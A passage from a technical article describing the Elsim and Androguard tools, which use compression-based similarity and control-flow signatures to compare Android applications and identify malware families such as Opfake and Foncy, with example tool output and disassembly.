+                               |---|
+                                 |
+                                 |
+                                 |
+                                 |         |---------|-->|Threshold|
+                                 |-------->| SORTING |
+                                           |---------|
+                                                |
+                                                |
+                                               /|\
+                                              / | \
+                                             /  |  \
+                                            /   |   \
+                                           /    |    \
+                                          /     |     \
+                         |N|<------------/      |      \-------->|D|
+                                                |
+                                                |---->|S|
+
+
+Moreover we can calculate a similarity "score" using the number of
+identical elements and the value of the similar elements.
+
+Here is a simple example showing you how it is possible to use the
+algorithm (elsim_text.py). In this case, it's used to compare two plain
+text files. We modified the COPYING.LESSER text by changing the order of
+few paragraphs and removing (or adding) words:
+
+###########################################
+ds@t0t0:~/elsim$ ./tests/example_text_sim.py -i
+examples/text/COPYING.LESSER examples/text/COPYING.LESSER.MODIF_REORDER
+Elements:
+        IDENTICAL:     106
+        SIMILAR:         2
+        NEW:             0
+        DELETED:         0
+        SKIPPED:         2
+       --> sentences: 99.783060% of similarities
+###########################################
+
+As you can see, with a few modifications the two files are maximally
+similar even if the elements are not at the same place. And if you add some
+debugging information, you can see the two modified sentences:
+
+###########################################
+[...]
+SIMILAR sentences:
+       138 'This version of the GNU Lesser General Public License
+       incorporates the terms and conditions of version 3 of the GNU
+       General Public License' --> 131 'This version of the GNU General
+       Public License incorporates the terms and conditions of version 3
+       of the GNU General Public License' 0.105263158679
+       71 'and the "GNU GPL" refers to version 3 of the GNU General Public
+       License' --> 76 'and the "GNU GPL HOOK" refers to version 3 of the
+       GNU General Public License' 0.129032254219
+[...]
+###########################################
+
+----[ 2.2 In a set of elements
+
+The previous algorithm is interesting in order to compare two elements, but
+if you have more or if you wish to search for a specific signature in a set
+of elements, it can be very long. That's why we need to use a clustering
+algorithm [28] to accelerate it.
+
+So, an element will be defined by:
+    - a string (a signature),
+    - a set of float values.
+
+The float values are classically features vectors that we will use the set
+of floats to perform the clustering (and you can use specific weights if
+you think that some elements of the set are more important than others).
+For example if you consider that the first float value if more important
+than the second one for clustering you can add a higher weight.
+
+In order to have more complex searches (i.e. if you wish to match multiple
+elements at the same time or only a specific element and not another, etc.)
+we will use a signature which will be composed of several elements and a
+Boolean formula whose purpose is to check if a signature matches.
+
+The algorithm is:
+
+    - Load signatures from the database and elements
+
+    - Execute a classical clustering [28] algorithm (kmeans [3] for
+      example) to reduce the number of comparisons by using the set of
+      float values
+
+    - For each cluster, compare the loaded from the database signatures
+      with the elements
+
+        - If the NCD value is below the threshold and if the Boolean
+          formula is true then we have found a valid signature (so we have
+          a valid match!)
+
+|---SIGN---|                 |---ELEM---|
+|    X1    |                 |    E1    |
+|    X2    |                 |    E2    |
+|    X3    |                 |    E3    |
+|----Xn----|                 |----En----|
+     |        |----------|        |
+     |------->|CLUSTERING|<-------|
+              |----------|
+                |  |  |
+                |  |  |->Cn
+                |  |
+                |  |->Cn-1
+                |
+                |
+                |
+                |   __C1__
+                |->|  X1  |       |---|---------->|Kolmogorov|
+                   |  E1  |------>|NCD|
+                   |  ..  |   ^   |---|
+                              |     |
+                              |     |
+                              |     |
+                              |     |---------->|Threshold|
+                              |                      |
+                              |                      |
+                              |                      |
+                              |                      |
+                              |                     / \
+                              |                    /   \
+                              |                   /     \
+                              |                  F       T
+                              |                 /         \
+                              |----------------/           |
+                              |                            |
+                              |                        |--------|
+                              |                        |   BF   |
+                              |                        |--------|
+                              |                            |
+                              |                            |
+                              |                           / \
+                              |                          /   \
+                              |                         F     T
+                              |------------------------/       \
+                                                                |
+                                                             |-----|
+                                                             | OK  |
+                                                             |-----|
+
+Simple, no ? :)
+
+Here is an example (example_sign.py) which shows you how to load signatures
+and elements, and check if a signature is present.
+
+In the following example, we have two signatures composed of elements and a
+set of "external" data to test. In the dataset, we have a corresponding
+signature and a false positive:
+
+###########################################
+SIGNS = [
+            [ "Sign1", "a",
+                [ [ 4.4915299415588379, 4.9674844741821289,
+                    4.9468302726745605, 0.0 ], "HELLO
+                    WORLDDDDDDDDDDDDDDDDDDDDDDD" ] ],
+                [ "Sign2", "a && b",
+                    [ [ 2.0, 3.0, 4.0, 5.0 ], "OOOPS !!!!!!!!" ],
+                    [ [ 2.0, 3.0, 4.0, 8.0], "OOOOOOOOPPPPPS !!!" ] ],
+]
+ELEMS = [
+            [ [ 4.4915299415588379, 4.9674844741821289,
+            4.9468302726745605, 0.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD"
+            ],
+            [ [ 4.4915299415588379, 4.9674844741821289,
+            4.9468302726745605, 1.0 ], "FALSE POSITIVE" ],
+            [ [ 2.0, 3.0, 4.0, 5.0 ],
+            "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
+            [ [ 2.0, 3.0, 4.0, 5.0 ],
+            "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
+            [ [ 2.0, 3.0, 4.0, 5.0 ],
+            "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
+            [ [ 2.0, 3.0, 4.0, 5.0 ],
+            "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
+]
+###########################################
+
+Each signature is composed of either one or several elements and a Boolean
+formula ("a" is the first element, "b" is the second element, etc.).
+
+By running the example, we can see that one signature is detected. It is
+displayed along with several statistics (such as the number of clusters,
+the number of comparisons (1) and the number of comparisons without (18)
+this algorithm).
+
+###########################################
+d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py
+['Sign1', [0, 1, 0.1875]]
+[SIGN:3 CLUSTERS:3 CMP_CLUSTERS:2 ELEMENTS:6 CMP_ELEMENTS:1
+-> 18 5.555556%]
+###########################################
+
+If we remove the matching element, we can see that we can't detect a match
+of the signature anymore, even if we have close entropies (fake values in
+this case) with a signature (but the string is not the same):
+
+###########################################
+d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py
+[None]
+[SIGN:3 CLUSTERS:2 CMP_CLUSTERS:2 ELEMENTS:5 CMP_ELEMENTS:3
+-> 15 20.000000%]
+###########################################
+
+--[ 3 - Real World: Android
+
+Now we can apply our algorithms to a real world problem domain. We have
+chosen that of Android applications and malware identification. One of the
+main problems with Android Apps is the plagiarism due to the facilities to
+modify and spread an application.
+
+----[ 3.1 Similarities between two applications
+
+To use our generic algorithm, we must first define what are the "string"
+and the "hash" properties of an element. So, what is an element in the case
+of an Android application? We define it as a method or a class. The
+"string" is the signature of a method and the "hash" is the sequence of
+instructions.
+
+Our signature is based on the grammar described by Silvio Cesare [2]. This
+grammar is very simple:
+
+#########################################################################
+Procedure ::= StatementList
+StatementList ::= Statement | Statement StatementList
+Statement ::= BasicBlock | Return | Goto | If | Field | Package | String
+Return ::= 'R'
+Goto ::= 'G'
+If ::= 'I'
+BasicBlock ::= 'B'
+Field ::= 'F'0 | 'F'1
+Package ::= 'P' PackageNew | 'P' PackageCall
+PackageNew ::= '0'
+PackageCall ::= '1'
+PackageName ::= Epsilon | Id
+String ::= 'S' Number | 'S' Id
+Number ::= \d+
+Id ::= [a-zA-Z]\w+
+#########################################################################
+
+For example if we have the following code:
+
+    mov X, 4
+    mov Z, 5
+    add X, Z
+    goto +50
+    add X, Z
+    goto -100
+
+Then the signature is:
+
+    B[G]B[G]
+
+We do not take into account the different instructions but rather the
+information about the structure of the method.
+
+With an Android method, this gives a more complex signature:
+
+Code:
+       [...]
+       call [ meth@ 22 Ljava/lang/String; valueOf
+              ['(I)', 'Ljava/lang/String;'] ]
+       goto 50
+
+Signature:
+       B[P1{Ljava/lang/String; valueOf (I)Ljava/lang/String;}G]
+
+We only use the control flow graph (CFG) of the methods along with specific
+instructions of the CFG such as "if*" or "goto". All the instructions like
+sparse/packed switch [4] are translated to "goto" instructions without
+details. We can add information about the packages, and especially about
+the Android/Java packages. Indeed, it's an important information to include
+in the signature (e.g.: you must use the sendTextMessage API to send an
+SMS).
+
+In the signature we can also add if a method of a package is called, or if
+there is the creation of an object, or even if a field is read or written.
+Of course, it's possible to modify this kind of signature if you want to
+take into account each instruction of the method. However in our case (and
+after experimental results) it seems useless since we don't depend on the
+"nature" of each instruction, but only on higher level information.
+
+We can extend this concept by using "predefined" signatures to help us:
+
+    - 0: information about packages (called/created) and fields, no
+         specific information about string
+
+    - 1: 0 + but with the size of strings,
+
+    - 2: 0 + filtering android packages names,
+
+    - 3: 0 + filtering Java packages names,
+
+    - 4: 0 + filtering Android/Java packages.
+
+If we have different types of signatures, we are then able to change
+dynamically the signature in case the global structure of a function or the
+Android packages in the structure are more interesting to us.
+
+For example, if we disassemble a particular method using Androguard [1] or
+smali/baksmali [27], we obtain different signatures:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androlyze.py -s
+Androlyze version 1.0
+In [1]: a, d, dx =
+AnalyzeAPK("./examples/android/TestsAndroguard/bin/TestsAndroguard.apk")
+In [5]: d.CLASS_Ltests_androguard_TestIfs.METHOD_testCFG.pretty_show()
+       METHOD access_flags=public (Ltests/androguard/TestIfs; testCFG,()V)
+       local registers: v0...v7
+return:void
+testCFG-BB@0x0 :
+       0(0) const/4 v0 , [ #+ 1 ] // {1}
+       1(2) const/4 v1 , [ #+ 1 ] // {1}
+       2(4) const/4 v2 , [ #+ 1 ] // {1}
+       3(6) const/4 v3 , [ #+ 1 ] // {1} [ testCFG-BB@0x8 ]
+
+testCFG-BB@0x8 :
+       4(8) iget-boolean v4 , v7 , [ field@ 14 Ltests/androguard/TestIfs;
+            Z P ]
+       5(c) if-eqz v4 , [ + 77 ] [ testCFG-BB@0x10  testCFG-BB@0xa6 ]
+
+testCFG-BB@0x10 :
+       6(10) move v1 , v0
+       7(12) iget-boolean v4 , v7 , [ field@ 15 Ltests/androguard/TestIfs;
+             Z Q ]
+       8(16) if-eqz v4 , [ + 70 ] [ testCFG-BB@0x1a  testCFG-BB@0xa2 ]
+
+testCFG-BB@0x1a :
+       9(1a) const/4 v3 , [ #+ 2 ] // {2} [ testCFG-BB@0x1c ]
+
+testCFG-BB@0x1c :
+       10(1c) add-int/lit8 v2 , v2 , [ #+ 1 ] [ testCFG-BB@0x20 ]
+
+testCFG-BB@0x20 :
+      11(20) sget-object v4 , [ field@ 0 Ljava/lang/System;
+             Ljava/io/PrintStream; out ]
+       12(24) new-instance v5 , [ type@ 25 Ljava/lang/StringBuilder; ]
+       13(28) invoke-static v0 , [ meth@ 22 Ljava/lang/String; valueOf
+              ['(I)', 'Ljava/lang/String;'] ]
+       14(2e) move-result-object v6
+       15(30) invoke-direct v5 , v6 , [ meth@ 25 Ljava/lang/StringBuilder;
+              ['(Ljava/lang/String;)', 'V'] ]
+       16(36) const-string v6 , [ string@ 5 ',' ]
+       17(3a) invoke-virtual v5 , v6 , [ meth@ 31
+              Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
+              'Ljava/lang/StringBuilder;'] ]
+       18(40) move-result-object v5
+       19(42) invoke-virtual v5 , v1 , [ meth@ 28
+              Ljava/lang/StringBuilder; append ['(I)',
+              'Ljava/lang/StringBuilder;'] ]
+       20(48) move-result-object v5
+       21(4a) const-string v6 , [ string@ 5 ',' ]
+       22(4e) invoke-virtual v5 , v6 , [ meth@ 31
+              Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
+              'Ljava/lang/StringBuilder;'] ]
+       23(54) move-result-object v5
+       24(56) invoke-virtual v5 , v2 , [ meth@ 28
+              Ljava/lang/StringBuilder; append ['(I)',
+              'Ljava/lang/StringBuilder;'] ]
+       25(5c) move-result-object v5
+       26(5e) const-string v6 , [ string@ 5 ',' ]
+       27(62) invoke-virtual v5 , v6 , [ meth@ 31
+              Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
+              'Ljava/lang/StringBuilder;'] ]
+       28(68) move-result-object v5
+       29(6a) invoke-virtual v5 , v3 , [ meth@ 28
+              Ljava/lang/StringBuilder; append ['(I)',
+              'Ljava/lang/StringBuilder;'] ]
+       30(70) move-result-object v5
+       31(72) invoke-virtual v5 , [ meth@ 32 Ljava/lang/StringBuilder;
+              toString ['()', 'Ljava/lang/String;'] ]
+       32(78) move-result-object v5
+       33(7a) invoke-virtual v4 , v5 , [ meth@ 8 Ljava/io/PrintStream;
+              println ['(Ljava/lang/String;)', 'V'] ] [ testCFG-BB@0x80 ]
+
+testCFG-BB@0x80 :
+       34(80) iget-boolean v4 , v7 , [ field@ 16
+              Ltests/androguard/TestIfs; Z R ]
+       35(84) if-eqz v4 , [ + 4 ] [ testCFG-BB@0x88  testCFG-BB@0x8c ]
+
+testCFG-BB@0x88 :
+       36(88) add-int/lit8 v3 , v3 , [ #+ 4 ] [ testCFG-BB@0x8c ]
+
+testCFG-BB@0x8c :
+       37(8c) iget-boolean v4 , v7 , [ field@ 17
+              Ltests/androguard/TestIfs; Z S ]
+       38(90) if-eqz v4 , [ + -8 ] [ testCFG-BB@0x94  testCFG-BB@0x80 ]
+
+testCFG-BB@0x94 :
+       39(94) add-int/lit8 v0 , v0 , [ #+ 6 ]
+       40(98) iget-boolean v4 , v7 , [ field@ 18
+              Ltests/androguard/TestIfs; Z T ]
+       41(9c) if-eqz v4 , [ + -74 ] [ testCFG-BB@0xa0  testCFG-BB@0x8 ]
+
+testCFG-BB@0xa0 :
+       42(a0) return-void
+
+testCFG-BB@0xa2 :
+       43(a2) const/4 v3 , [ #+ 3 ] // {3}
+       44(a4) goto [ + -68 ] [ testCFG-BB@0x1c ]
+
+testCFG-BB@0xa6 :
+       45(a6) add-int/lit8 v2 , v2 , [ #+ 2 ]
+       46(aa) goto [ + -69 ] [ testCFG-BB@0x20 ]
+#########################################################################
+
+By using the first kind of predefined signature, we can see each basic
+block with some information. By filtering Java packages we have more
+information about the behavior of the method:
+
+#########################################################################
+In [6]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs.
+METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_0).get_string()
+Out[6]: 'B[]B[I]B[I]B[]B[]B[P0P1P1P1P1P1P1P1P1P1P1]B[I]B[]B[I]B[I]B[R]
+B[G]B[G]'
+In [9]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs.
+METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_3).get_string()
+Out[9]: 'B[]B[I]B[I]B[]B[]B[P0{Ljava/lang/StringBuilder;}P1
+{Ljava/lang/String;valueOf(I)Ljava/lang/String;}
+P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
+P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
+Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
+Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
+Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
+P1{Ljava/io/PrintStream;println(Ljava/lang/String;)V}]
+B[I]B[]B[I]B[I]B[R]B[G]B[G]'
+#########################################################################
+
+With SIGNATURE_L0_0 being 0 and SIGNATURE_L0_3 being 3.
+
+We can test our signature with a real malware like Foncy [5]:
+
+#########################################################################
+In [15]: a, d, dx =
+AnalyzeAPK("./apks/malwares/foncy/6be2988a916cb620c71ff3d8d4dac5db2881c6\
+75dd34a4bb7b238b5899b48600")
+#########################################################################
+
+In this case, we are more interested in signatures embedding Android
+packages, Java packages or both:
+
+#########################################################################
+In [16]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
+METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_2).get_string()
+Out[16]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V}P0
+P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;}P1
+P1P1P1P1P0P0P1P1P1P1P1P1I]B[R]B[P1]
+B[P1{Landroid/telephony/SmsManager;getDefault()
+Landroid/telephony/SmsManager;}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}
+P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
+Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
+Landroid/app/PendingIntent;)V}P2
+P1{Landroid/widget/Toast;makeText(Landroid/content/Context;
+Ljava/lang/CharSequence; I)Landroid/widget/Toast;}
+P1{Landroid/widget/Toast;show()V}G]B[G]'
+
+In [17]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
+METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_3).get_string()
+Out[17]: 'B[P1P0{Ljava/lang/StringBuilder;}P1
+P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;}
+P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
+P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
+P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
+Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
+P0{Ljava/io/File;}
+P0{Ljava/lang/StringBuilder;}
+P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
+P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
+P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
+Ljava/lang/StringBuilder;}
+P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
+P1{Ljava/io/File;(Ljava/lang/String;)V}
+P1{Ljava/io/File;exists()Z}I]B[R]
+B[P1{Ljava/io/File;createNewFile()Z}]
+B[P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P2P1P1G]B[G]'
+
+In [18]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
+METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_4).get_string()
+Out[18]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V}
+P0{Ljava/lang/StringBuilder;}
+P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;}
+P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;}
+P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
+P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
+P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
+[...]
+Landroid/app/PendingIntent;)V}
+[...]
+B[G]'
+#########################################################################
+
+It's interesting to see that even if our basic blocks are in a different
+order, the Kolmogorov complexity is preserved and that we observe an
+important similarity (TestReorg function). If we reorganize each basic
+block in the signature we can see that the results are quite the same (so
+basically the NCD bypasses a basic CFG obfuscation):
+
+#########################################################################
+d@t0t0:~/elsim$ ./tests/test_similarity.py
+*  LZMA
+(0.031779661774635315, 0)
+(0.031779661774635315, 0)
+(0.04237288236618042, 0)
+(0.040169134736061096, 0)
+(0.03983228653669357, 0)
+(0.03991596773266792, 0)
+(0.042016807943582535, 0)
+(0.039256200194358826, 0)
+(0.04356846585869789, 0)
+(0.03933747485280037, 0)
+(0.03719008341431618, 0)
+(0.043478261679410934, 0)
+(0.043478261679410934, 0)
+(0.04025423899292946, 0)
+(0.04411764815449715, 0)
+(0.041580040007829666, 0)
+(0.04149377718567848, 0)
+(0.03563941270112991, 0)
+(0.03966597095131874, 0)
+(0.03563941270112991, 0)
+(0.04184100404381752, 0)
+(0.04393305256962776, 0)
+(0.03974895551800728, 0)
+(0.03983228653669357, 0)
+(0.041753653436899185, 0)
+[....]
+#########################################################################
+
+The "hash" is the sequence of instructions in each method, and for each
+instruction we remove the information depending on the compilation
+(registers, etc.).
+
+Having defined the "string" and the "hash" properties in the specific
+context of Android Apps, we can now test the algorithm on various samples.
+We use a tool called "androsim.py" which is a simple script based on
+"Elsim".
+
+This tool detects and reports:
+
+    - the identical methods;
+    - the similar methods;
+    - the deleted methods;
+    - the new methods;
+    - the skipped methods.
+
+Moreover, a similarity score (between 0.0 to 100.0) is calculated upon the
+values of the identical methods (1.0) and the similar methods (in this
+particular case, we calculate the final values using the BZ2 compressor due
+to the fact that the return value is more "interesting" for the score). It
+is more interesting because you will have an understandable value related
+to the similarity.
+
+For the first test we use the "opfake" malware [6]. If we take two samples
+from the same family, an important value of similarity is revealed:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsim.py -i
+apks/malwares/opfake/\
+b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
+apks/malwares/opfake/\
+b906279e8c79a12e5a10feafe5db850024dd75e955e9c2f9f82bbca10e0585a6
+
+Elements:
+        IDENTICAL:     34
+        SIMILAR:        5
+        NEW:            0
+        DELETED:        0
+        SKIPPED:        0
+       --> methods: 99.100500% of similarities
+#########################################################################
+
+These two samples have similar methods and it's possible to have more
+information by specifying the "-d" option:
+
+#########################################################################
+SIMILAR methods:
+       Lcom/reg/MainRegActivity; displayFakeProgress ()V 61
+               --> Lcom/reg/MainRegActivity; displayFakeProgress ()V
+                   61 0.0909090936184
+       Lcom/reg/MainRegActivity; getNextButton ()Landroid/widget/Button;
+       40
+               --> Lcom/reg/MainRegActivity; getNextButton
+               ()Landroid/widget/Button; 40 0.125
+       Lcom/reg/MainRegActivity; showLinkForm ()V 111
+               --> Lcom/reg/MainRegActivity; showLinkForm ()V
+               111 0.183673471212
+       Lcom/reg/MainRegActivity; showRules ()V 132
+               --> Lcom/reg/MainRegActivity; showRules ()V
+               132 0.0731707289815
+       Lcom/reg/MainRegActivity; setMainScreen ()V 147
+               --> Lcom/reg/MainRegActivity; setMainScreen ()V
+               147 0.319148927927
+IDENTICAL methods:
+       Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String;
+       Ljava/lang/String;)V 76
+               --> Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String;
+               Ljava/lang/String;)V 76
+
+       Lcom/reg/SmsReceiver; setListener (Lcom/reg/SMSAction;)V 3
+               --> Lcom/reg/SmsReceiver; setListener
+               (Lcom/reg/SMSAction;)V 3
+
+       Lcom/reg/MainRegActivity; loadString (I)Ljava/lang/String; 52
+               --> Lcom/reg/MainRegActivity; loadString (I)
+               Ljava/lang/String; 52
+
+       Lcom/reg/MainRegActivity; access$600 ()Ljava/lang/String; 3
+               --> Lcom/reg/MainRegActivity; access$600
+               ()Ljava/lang/String; 3
+
+       Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String;
+       Ljava/lang/String;)Ljava/util/Vector; 82
+               --> Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String;
+               Ljava/lang/String;)Ljava/util/Vector; 82
+
+       Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String;
+       Ljava/lang/String;)Ljava/lang/String; 52
+               --> Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String;
+               Ljava/lang/String;)Ljava/lang/String; 52
+
+       Lcom/reg/MainRegActivity; SaveSuccess ()V 23
+               --> Lcom/reg/MainRegActivity; SaveSuccess ()V 23
+
+       Lcom/reg/SmsReceiver; onReceive (Landroid/content/Context;
+       Landroid/content/Intent;)V 59
+               --> Lcom/reg/SmsReceiver; onReceive
+               (Landroid/content/Context; Landroid/content/Intent;)V 59
+
+       Lcom/reg/ParseXml; getXMLIntElement (Ljava/lang/String;
+       Ljava/lang/String;)I 55
+               --> Lcom/reg/ParseXml; getXMLIntElement
+               (Ljava/lang/String; Ljava/lang/String;)I 55
+
+       Lcom/reg/MainRegActivity; getCountry ()Ljava/lang/String; 13
+               --> Lcom/reg/MainRegActivity; getCountry
+               ()Ljava/lang/String; 13
+
+       Lcom/reg/MainRegActivity$5; onReceive (Landroid/content/Context;
+       Landroid/content/Intent;)V 35
+               --> Lcom/reg/MainRegActivity$5; onReceive
+               (Landroid/content/Context; Landroid/content/Intent;)V 35
+
+       Lcom/reg/MainRegActivity$1; (Lcom/reg/MainRegActivity;)V 6
+               --> Lcom/reg/MainRegActivity$1;
+               (Lcom/reg/MainRegActivity;)V 6
+
+       Lcom/reg/MainRegActivity$S_itm; (Lcom/reg/MainRegActivity;)V 21
+               --> Lcom/reg/MainRegActivity$S_itm;
+               (Lcom/reg/MainRegActivity;)V 21
+[...]
+NEW methods:
+DELETED methods:
+SKIPPED methods:
+#########################################################################
+
+Basically we are able to determine if two samples are from the same malware
+family. If they are, the analyst can start his analysis from the similar
+methods.
+
+In the next part we will see how we can see the differences (what
+instructions have been modified) between two similar methods. If we test
+the tool by using two different samples (like opfake and foncy) we observe
+the following:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsim.py -i
+apks/malwares/opfake/\
+b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
+apks/malwares/foncy/\
+01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5
+
+Elements:
+        IDENTICAL:     1
+        SIMILAR:       0
+        NEW:           2
+        DELETED:       38
+        SKIPPED:       0
+       --> methods: 33.333333% of similarities
+#########################################################################
+
+We see a strange similarity score due to the fact that all methods,
+including those of small size, have been compared. We can skip the specific
+case of methods having a small size using the "-s" option (to filter
+according to the size of the method in bytes):
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsim.py -i
+apks/malwares/opfake/\
+b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
+apks/malwares/foncy/\
+01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5 -s 10
+
+Elements:
+        IDENTICAL:     0
+        SIMILAR:       0
+        NEW:           2
+        DELETED:       29
+        SKIPPED:       33
+       --> methods: 0.000000% of similarities
+#########################################################################
+
+We can do a lot of things with this kind of tool such as:
+        - detecting plagiarism between two android applications
+        - checking if an application is correctly protected with
+          an obfuscator
+        - extracting easily injected codes (if you know the original
+          application)
+
+There are many other interesting "ways" to use this tool such as
+discovering if malware samples have been written by the same author, or if
+some pieces of code have been reused. Analyzing the "faketoken" [7] sample
+and the "opfake.d" sample we have observed an interesting result.
+
+The first sample "faketoken" is detected by 19/43 antivirus products on
+VirusTotal [8]. The second sample "opfake.d" is detected by 16/41 antivirus
+products on VirusTotal [9]. All of these antivirus products are using
+different names  with the exception of DrWeb.
+
+Now if we run our tool we observe the following output:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsim.py -i
+apks/plagiarism/opfake/\
